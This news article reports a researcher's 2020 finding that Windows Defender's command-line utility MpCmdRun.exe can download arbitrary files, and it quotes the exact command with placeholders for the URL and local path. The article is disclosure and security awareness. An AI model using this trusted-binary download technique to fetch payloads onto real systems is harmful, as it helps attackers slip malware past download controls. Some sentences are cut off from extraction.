Windows Defender Bug Surprisingly Allows Directly Downloaded Malware Into Windows
They say with great power comes great responsibility, and you would think Windows Defender
would be incredibly responsible -- at least when it comes to security. As it turns out, however, that Windows Defender shared its “great power” in allowing its command line utility to download potentially malicious files to a Windows
Windows Defender, the basic malware protection on any modern Windows PC
, also comes packed with another handy feature: a command line interface. The “MpCmdRun.exe” (Microsoft Protection CMD) allows for utilization of security features through command line. Users could scan, trace, and tinker with a variety of commands. Now, in an update to Windows Defender, security researcher Askar Mohammad discovered that files can be downloaded with the -DownloadFile
argument and a URL to accompany it.
You can use C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path> to download your file using Windows defender itself.
— Askar (@mohammadaskar2) September 2, 2020
functionality allows a local user to download a file. In theory, however, Windows Defender and hopefully other antivirus
software packages should detect malware and remove it. No matter what, this is just another vulnerability that could be exploited that people need to watch out for.
Ultimately, it is rather interesting that something like this was discovered. One would think that a defender would not normally allow an attacker through the front gate. In any case, this is a healthy reminder to make sure your network ports are secure and unwanted downloads are blocked while upholding any "great responsibility."